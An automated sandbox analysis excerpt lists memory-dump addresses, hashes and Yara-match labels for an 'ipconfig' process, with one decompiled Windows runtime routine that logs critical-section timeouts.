                                                                                                                                                                                                                                                                                                                            0x03396107
                                                                                                                                                                                                                                                                                                                            0x03396109
                                                                                                                                                                                                                                                                                                                            0x0339610b
                                                                                                                                                                                                                                                                                                                            0x0339610b
                                                                                                                                                                                                                                                                                                                            0x0339610b
                                                                                                                                                                                                                                                                                                                            0x0339610b
                                                                                                                                                                                                                                                                                                                            0x0339610f
                                                                                                                                                                                                                                                                                                                            0x0339610f
                                                                                                                                                                                                                                                                                                                            0x03396117
                                                                                                                                                                                                                                                                                                                            0x0339611a
                                                                                                                                                                                                                                                                                                                            0x0339611f
                                                                                                                                                                                                                                                                                                                            0x03396125
                                                                                                                                                                                                                                                                                                                            0x03396134
                                                                                                                                                                                                                                                                                                                            0x03396139
                                                                                                                                                                                                                                                                                                                            0x0339613f
                                                                                                                                                                                                                                                                                                                            0x03396146
                                                                                                                                                                                                                                                                                                                            0x03396148
                                                                                                                                                                                                                                                                                                                            0x0339614b
                                                                                                                                                                                                                                                                                                                            0x0339614d
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x0339614f
                                                                                                                                                                                                                                                                                                                            0x03396153
                                                                                                                                                                                                                                                                                                                            0x03396159
                                                                                                                                                                                                                                                                                                                            0x03396159
                                                                                                                                                                                                                                                                                                                            0x0339615c
                                                                                                                                                                                                                                                                                                                            0x03396163
                                                                                                                                                                                                                                                                                                                            0x03396169
                                                                                                                                                                                                                                                                                                                            0x0339616c
                                                                                                                                                                                                                                                                                                                            0x03396172
                                                                                                                                                                                                                                                                                                                            0x03396181
                                                                                                                                                                                                                                                                                                                            0x03396186
                                                                                                                                                                                                                                                                                                                            0x03396187
                                                                                                                                                                                                                                                                                                                            0x0339618b
                                                                                                                                                                                                                                                                                                                            0x03396191
                                                                                                                                                                                                                                                                                                                            0x03396195
                                                                                                                                                                                                                                                                                                                            0x033961a3
                                                                                                                                                                                                                                                                                                                            0x033961bb
                                                                                                                                                                                                                                                                                                                            0x033961c0
                                                                                                                                                                                                                                                                                                                            0x033961c3
                                                                                                                                                                                                                                                                                                                            0x033961cc
                                                                                                                                                                                                                                                                                                                            0x033961d0
                                                                                                                                                                                                                                                                                                                            0x033961dc
                                                                                                                                                                                                                                                                                                                            0x033961de
                                                                                                                                                                                                                                                                                                                            0x033961e1
                                                                                                                                                                                                                                                                                                                            0x033961e4
                                                                                                                                                                                                                                                                                                                            0x033961e6
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e8
                                                                                                                                                                                                                                                                                                                            0x033961e6
                                                                                                                                                                                                                                                                                                                            0x033961ec
                                                                                                                                                                                                                                                                                                                            0x033961f3
                                                                                                                                                                                                                                                                                                                            0x03396203
                                                                                                                                                                                                                                                                                                                            0x03396209
                                                                                                                                                                                                                                                                                                                            0x0339620a
                                                                                                                                                                                                                                                                                                                            0x03396216
                                                                                                                                                                                                                                                                                                                            0x0339621d
                                                                                                                                                                                                                                                                                                                            0x03396227
                                                                                                                                                                                                                                                                                                                            0x03396241
                                                                                                                                                                                                                                                                                                                            0x03396246
                                                                                                                                                                                                                                                                                                                            0x0339624c
                                                                                                                                                                                                                                                                                                                            0x03396257
                                                                                                                                                                                                                                                                                                                            0x03396259
                                                                                                                                                                                                                                                                                                                            0x0339625c
                                                                                                                                                                                                                                                                                                                            0x0339625e
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x03396260
                                                                                                                                                                                                                                                                                                                            0x0339625e
                                                                                                                                                                                                                                                                                                                            0x03396264
                                                                                                                                                                                                                                                                                                                            0x03396267
                                                                                                                                                                                                                                                                                                                            0x03396269
                                                                                                                                                                                                                                                                                                                            0x03396315
                                                                                                                                                                                                                                                                                                                            0x03396315
                                                                                                                                                                                                                                                                                                                            0x0339631b
                                                                                                                                                                                                                                                                                                                            0x0339631e
                                                                                                                                                                                                                                                                                                                            0x03396324
                                                                                                                                                                                                                                                                                                                            0x03396327
                                                                                                                                                                                                                                                                                                                            0x0339632f
                                                                                                                                                                                                                                                                                                                            0x03396330
                                                                                                                                                                                                                                                                                                                            0x03396333
                                                                                                                                                                                                                                                                                                                            0x0339633a
                                                                                                                                                                                                                                                                                                                            0x0339633c
                                                                                                                                                                                                                                                                                                                            0x03396335
                                                                                                                                                                                                                                                                                                                            0x03396335
                                                                                                                                                                                                                                                                                                                            0x03396335
                                                                                                                                                                                                                                                                                                                            0x0339633f
                                                                                                                                                                                                                                                                                                                            0x03396342
                                                                                                                                                                                                                                                                                                                            0x0339634c
                                                                                                                                                                                                                                                                                                                            0x03396352
                                                                                                                                                                                                                                                                                                                            0x03396355
                                                                                                                                                                                                                                                                                                                            0x03396355
                                                                                                                                                                                                                                                                                                                            0x03396359
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0339626f
                                                                                                                                                                                                                                                                                                                            0x03396275
                                                                                                                                                                                                                                                                                                                            0x03396275
                                                                                                                                                                                                                                                                                                                            0x03396278
                                                                                                                                                                                                                                                                                                                            0x0339627e
                                                                                                                                                                                                                                                                                                                            0x0339627e
                                                                                                                                                                                                                                                                                                                            0x03396281
                                                                                                                                                                                                                                                                                                                            0x03396287
                                                                                                                                                                                                                                                                                                                            0x0339628d
                                                                                                                                                                                                                                                                                                                            0x03396298
                                                                                                                                                                                                                                                                                                                            0x0339629c
                                                                                                                                                                                                                                                                                                                            0x033962a2
                                                                                                                                                                                                                                                                                                                            0x0339629e
                                                                                                                                                                                                                                                                                                                            0x0339629e
                                                                                                                                                                                                                                                                                                                            0x0339629e
                                                                                                                                                                                                                                                                                                                            0x033962a7
                                                                                                                                                                                                                                                                                                                            0x033962a7
                                                                                                                                                                                                                                                                                                                            0x033962aa
                                                                                                                                                                                                                                                                                                                            0x033962b0
                                                                                                                                                                                                                                                                                                                            0x033962f0
                                                                                                                                                                                                                                                                                                                            0x033962f0
                                                                                                                                                                                                                                                                                                                            0x033962f2
                                                                                                                                                                                                                                                                                                                            0x033962f8
                                                                                                                                                                                                                                                                                                                            0x033962fd
                                                                                                                                                                                                                                                                                                                            0x033962b2
                                                                                                                                                                                                                                                                                                                            0x033962b2
                                                                                                                                                                                                                                                                                                                            0x033962b2
                                                                                                                                                                                                                                                                                                                            0x033962b5
                                                                                                                                                                                                                                                                                                                            0x033962dd
                                                                                                                                                                                                                                                                                                                            0x033962e2
                                                                                                                                                                                                                                                                                                                            0x033962e5
                                                                                                                                                                                                                                                                                                                            0x033962b7
                                                                                                                                                                                                                                                                                                                            0x033962b8
                                                                                                                                                                                                                                                                                                                            0x033962bb
                                                                                                                                                                                                                                                                                                                            0x033962bd
                                                                                                                                                                                                                                                                                                                            0x033962c0
                                                                                                                                                                                                                                                                                                                            0x033962c4
                                                                                                                                                                                                                                                                                                                            0x033962cd
                                                                                                                                                                                                                                                                                                                            0x033962cd
                                                                                                                                                                                                                                                                                                                            0x033962c0
                                                                                                                                                                                                                                                                                                                            0x033962bb
                                                                                                                                                                                                                                                                                                                            0x033962b5
                                                                                                                                                                                                                                                                                                                            0x03396302
                                                                                                                                                                                                                                                                                                                            0x03396303
                                                                                                                                                                                                                                                                                                                            0x03396305
                                                                                                                                                                                                                                                                                                                            0x03396305
                                                                                                                                                                                                                                                                                                                            0x03396305
                                                                                                                                                                                                                                                                                                                            0x0339630c
                                                                                                                                                                                                                                                                                                                            0x0339630c
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0339627e
                                                                                                                                                                                                                                                                                                                            0x03396269
                                                                                                                                                                                                                                                                                                                            0x03395eac
                                                                                                                                                                                                                                                                                                                            0x03395ebb
                                                                                                                                                                                                                                                                                                                            0x03395ebe
                                                                                                                                                                                                                                                                                                                            0x03395ecb
                                                                                                                                                                                                                                                                                                                            0x03395ecb
                                                                                                                                                                                                                                                                                                                            0x03395ece
                                                                                                                                                                                                                                                                                                                            0x03395ece
                                                                                                                                                                                                                                                                                                                            0x03395ed4
                                                                                                                                                                                                                                                                                                                            0x03395ed7
                                                                                                                                                                                                                                                                                                                            0x03395ed9
                                                                                                                                                                                                                                                                                                                            0x03395edb
                                                                                                                                                                                                                                                                                                                            0x03395edb
                                                                                                                                                                                                                                                                                                                            0x03395ee1
                                                                                                                                                                                                                                                                                                                            0x03395ee1
                                                                                                                                                                                                                                                                                                                            0x03395ee3
                                                                                                                                                                                                                                                                                                                            0x03395f20
                                                                                                                                                                                                                                                                                                                            0x03395f20
                                                                                                                                                                                                                                                                                                                            0x03395ee5
                                                                                                                                                                                                                                                                                                                            0x03395ee5
                                                                                                                                                                                                                                                                                                                            0x03395ee5
                                                                                                                                                                                                                                                                                                                            0x03395ee8
                                                                                                                                                                                                                                                                                                                            0x03395f11
                                                                                                                                                                                                                                                                                                                            0x03395f18
                                                                                                                                                                                                                                                                                                                            0x03395eea
                                                                                                                                                                                                                                                                                                                            0x03395eea
                                                                                                                                                                                                                                                                                                                            0x03395eed
                                                                                                                                                                                                                                                                                                                            0x03395ef2
                                                                                                                                                                                                                                                                                                                            0x03395ef8
                                                                                                                                                                                                                                                                                                                            0x03395efb
                                                                                                                                                                                                                                                                                                                            0x03395f0a
                                                                                                                                                                                                                                                                                                                            0x03395f0a
                                                                                                                                                                                                                                                                                                                            0x03395eed
                                                                                                                                                                                                                                                                                                                            0x03395ee8
                                                                                                                                                                                                                                                                                                                            0x03395f22
                                                                                                                                                                                                                                                                                                                            0x03395f28
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395f30
                                                                                                                                                                                                                                                                                                                            0x03395f31
                                                                                                                                                                                                                                                                                                                            0x03395f37
                                                                                                                                                                                                                                                                                                                            0x03395f3a
                                                                                                                                                                                                                                                                                                                            0x03395f3d
                                                                                                                                                                                                                                                                                                                            0x03395f44
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395f46
                                                                                                                                                                                                                                                                                                                            0x03395f48
                                                                                                                                                                                                                                                                                                                            0x03395f4d
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395f4d
                                                                                                                                                                                                                                                                                                                            0x03395dda
                                                                                                                                                                                                                                                                                                                            0x03395ddf
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395ddf
                                                                                                                                                                                                                                                                                                                            0x03395dd8
                                                                                                                                                                                                                                                                                                                            0x03395da7
                                                                                                                                                                                                                                                                                                                            0x03395da9
                                                                                                                                                                                                                                                                                                                            0x03395dac
                                                                                                                                                                                                                                                                                                                            0x03395dae
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395db4
                                                                                                                                                                                                                                                                                                                            0x03395db4
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395db4
                                                                                                                                                                                                                                                                                                                            0x03395dae
                                                                                                                                                                                                                                                                                                                            0x03395d88
                                                                                                                                                                                                                                                                                                                            0x03395d8d
                                                                                                                                                                                                                                                                                                                            0x03396363
                                                                                                                                                                                                                                                                                                                            0x03396369
                                                                                                                                                                                                                                                                                                                            0x0339636a
                                                                                                                                                                                                                                                                                                                            0x03396370
                                                                                                                                                                                                                                                                                                                            0x03396372
                                                                                                                                                                                                                                                                                                                            0x0339637a
                                                                                                                                                                                                                                                                                                                            0x0339637b
                                                                                                                                                                                                                                                                                                                            0x0339637d
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0339637f
                                                                                                                                                                                                                                                                                                                            0x03396385
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03396385
                                                                                                                                                                                                                                                                                                                            0x03395d38
                                                                                                                                                                                                                                                                                                                            0x03395d3b
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03395d3b
                                                                                                                                                                                                                                                                                                                            0x03395d27
                                                                                                                                                                                                                                                                                                                            0x03395d29
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03396360
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x03396360
                                                                                                                                                                                                                                                                                                                            0x03395c10
                                                                                                                                                                                                                                                                                                                            0x03395c10
                                                                                                                                                                                                                                                                                                                            0x033963da
                                                                                                                                                                                                                                                                                                                            0x033963e5
                                                                                                                                                                                                                                                                                                                            0x033963e5

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: df9f3601b1f257dde0f631f8e9e1caa4ab1cc8a8225b9e68e110c8b7a4ba130e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3083db22dd6410f88d8c4c1b58e8489afb8e74a00df039e0072237fe19ca2076
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df9f3601b1f257dde0f631f8e9e1caa4ab1cc8a8225b9e68e110c8b7a4ba130e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46426975D01229CFEB24CF68C881BA9F7B5FF49314F1881AAD84DAB252E7349985CF50
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00758D76 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8a2d7d2ca3e486df4bfd0acb9a1def1349dff3caff22cafc169b56ecd1b09023
                                                                                                                                                                                                                                                                                                                            • Instruction ID: acc15b125f713899c227cf97798cd7bf75f425f90e5b2f8e86d523aaab62e9d3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2d7d2ca3e486df4bfd0acb9a1def1349dff3caff22cafc169b56ecd1b09023
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55C01266B012144B97105948B8461F1F3BAE557377F946293DC0DB74029A63C82D05AB
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00754DAB Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b6dbeed56dc71964d65b6c6ce43e63277262500c9ac8a32fcefae9652bb36e53
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 25ec7d2173e66ee071bef0d27e1919ae895eb61f07558fde9b0b7f052b1e90cf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6dbeed56dc71964d65b6c6ce43e63277262500c9ac8a32fcefae9652bb36e53
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DC08026B1A15016E317051D7C513B9F758C797130F0412D7D444F71418085C4D4515D
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0335FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                                            			E0335FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0330CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03355720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03355720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                                                                                                                                                                                                            0x0335fdda
                                                                                                                                                                                                                                                                                                                            0x0335fde2
                                                                                                                                                                                                                                                                                                                            0x0335fde5
                                                                                                                                                                                                                                                                                                                            0x0335fdec
                                                                                                                                                                                                                                                                                                                            0x0335fdfa
                                                                                                                                                                                                                                                                                                                            0x0335fdff
                                                                                                                                                                                                                                                                                                                            0x0335fe0a
                                                                                                                                                                                                                                                                                                                            0x0335fe0f
                                                                                                                                                                                                                                                                                                                            0x0335fe17
                                                                                                                                                                                                                                                                                                                            0x0335fe1e
                                                                                                                                                                                                                                                                                                                            0x0335fe19
                                                                                                                                                                                                                                                                                                                            0x0335fe19
                                                                                                                                                                                                                                                                                                                            0x0335fe19
                                                                                                                                                                                                                                                                                                                            0x0335fe20
                                                                                                                                                                                                                                                                                                                            0x0335fe21
                                                                                                                                                                                                                                                                                                                            0x0335fe22
                                                                                                                                                                                                                                                                                                                            0x0335fe25
                                                                                                                                                                                                                                                                                                                            0x0335fe40

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0335FDFA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0335FE2B
                                                                                                                                                                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0335FE01
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                                                                                                                                                                                                            • API String ID: 885266447-3903918235
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ab1fb3ce1eef82107082ddab034889d72cda4fdb6505bfa7cd271b259ad25220
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 04dbe0509157f2bbc0f3cb3effda96df760954c1dd2214e519bc12bed4220041
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab1fb3ce1eef82107082ddab034889d72cda4fdb6505bfa7cd271b259ad25220
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08F0F036640301BFEA209A45DC42F63BF6AEB45770F240314FA285A5E1EA62F86086F0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%